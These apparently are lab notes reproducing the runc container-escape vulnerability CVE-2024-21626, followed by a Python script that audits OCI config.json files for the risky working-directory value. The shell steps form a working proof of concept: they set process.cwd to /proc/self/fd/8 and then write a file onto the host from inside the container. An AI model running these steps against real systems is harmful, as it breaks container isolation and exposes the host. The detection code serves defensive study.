System - Docker - Container Escape - CVE-2024-21626



References:
https://nitroc.org/posts/cve-2024-21626-illustrated/#%E6%9E%84%E9%80%A0%E6%81%B6%E6%84%8F%E9%95%9C%E5%83%8F%E5%AE%9E%E7%8E%B0%E5%88%A9%E7%94%A8

Test environment
Ubuntu: 20.04.6 LTS (Focal Fossa)
Kernel: 5.8.0-23-generic
Runc: 1.1.7-0ubuntu1~20.04.1
Docker: 20.10.25, build 20.10.25-0ubuntu1~20.04.2
Containerd: 1.7.2

Test steps

$ docker run --name helper-ctr alpine
$ docker export helper-ctr --output alpine.tar
$ mkdir rootfs
$ tar xf alpine.tar -C rootfs
$ runc spec
$ sed -ri 's#(\s*"cwd": )"(/)"#\1 "/proc/self/fd/8"#g' config.json
$ grep cwd config.json
$ sudo runc --log ./log.json run demo

# echo "test" > ../../../tmp/cve-test
# exit

$ cat /tmp/cve-test 
    test
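
The steps above depend on `process.cwd` in the bundle's config.json being pointed at an entry under /proc/self/fd. A pre-run check for that value follows, as an added example that is not part of the original notes or of runc. The function names, the script name and the sample configs are assumptions constructed for illustration.

```python
import json
import re
import sys

# /proc/<self|thread-self|PID>[/task/<TID>]/fd : a directory of symlinks to open fds
_PROC_FD_DIR = re.compile(r"/proc/(self|thread-self|\d+)(/task/\d+)?/fd")


def cwd_enters_proc_fd(cwd):
    """Lexically walk cwd; True if any prefix lands in a procfs fd directory."""
    stack = []
    for part in cwd.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if stack:
                stack.pop()
            continue
        stack.append(part)
        # Checked at every step, so ".." placed after the fd entry cannot hide it.
        if _PROC_FD_DIR.fullmatch("/" + "/".join(stack)):
            return True
    return False


def audit_config(config_text):
    """Return findings (list of str) for the text of one OCI bundle config.json."""
    cwd = (json.loads(config_text).get("process") or {}).get("cwd")
    if not isinstance(cwd, str) or not cwd.startswith("/"):
        return [f"process.cwd is not an absolute path: {cwd!r}"]
    if cwd_enters_proc_fd(cwd):
        return [f"process.cwd points into a procfs fd directory: {cwd!r}"]
    return []


# Constructed samples: the default that `runc spec` writes, and the edited value.
SAMPLE_DEFAULT = '{"process": {"cwd": "/"}}'
SAMPLE_EDITED = '{"process": {"cwd": "/proc/self/fd/8"}}'

if __name__ == "__main__":
    # Usage (hypothetical script name): python3 audit_cwd.py path/to/config.json [...]
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8") as fh:
            for finding in audit_config(fh.read()):
                print(f"{path}: {finding}")
```

The check is lexical only: it does not resolve symlinks inside the rootfs, so it complements rather than replaces running a patched runc.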